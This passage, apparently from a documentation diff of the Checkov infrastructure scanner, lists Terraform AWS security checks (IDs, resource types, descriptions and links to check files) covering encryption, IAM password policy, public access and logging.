[LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 54 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | -| 55 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | -| 56 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | -| 57 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | -| 58 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | -| 59 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | -| 60 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one 
uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | -| 61 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | -| 62 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 63 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 64 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | -| 65 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 66 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 67 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. 
| Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 68 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 69 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 70 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 71 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | -| 72 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 73 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 74 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | 
[SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 75 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 76 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 77 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 78 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 79 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 80 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 81 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no 
security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 82 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 83 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 84 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 85 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | -| 86 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | -| 87 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | -| 88 | CKV_AWS_29 | resource | 
aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 89 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 90 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 91 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | -| 92 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | -| 93 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 94 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at 
rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | -| 95 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | -| 96 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | -| 97 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | -| 98 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | -| 99 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 100 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) 
| Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 101 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 102 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | -| 103 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | -| 104 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 105 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 106 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 107 | CKV_AWS_46 | resource | aws_instance | Ensure no 
hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 108 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 109 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 110 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | -| 111 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | -| 112 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | -| 113 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | -| 114 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | -| 115 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | 
Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) |
-| 116 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) |
-| 117 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) |
-| 118 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) |
-| 119 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
-| 120 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. 
| Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
-| 121 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) |
-| 122 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) |
-| 123 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
-| 124 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
-| 125 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 126 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 127 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges 
are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 128 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 129 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 130 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 131 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 132 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 133 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 134 | CKV_AWS_63 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 135 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) |
-| 136 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) |
-| 137 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) |
-| 138 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) |
-| 139 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) |
-| 140 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) |
-| 141 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any 
Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
-| 142 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
-| 143 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) |
-| 144 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) |
-| 145 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) |
-| 146 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) |
-| 147 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) |
-| 148 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | 
[APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
-| 149 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
-| 150 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) |
-| 151 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) |
-| 152 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
-| 153 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
-| 154 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
-| 155 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) |
-| 156 | 
CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) |
-| 157 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) |
-| 158 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) |
-| 159 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) |
-| 160 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) |
-| 161 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) |
-| 162 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) |
-| 163 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront 
distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) |
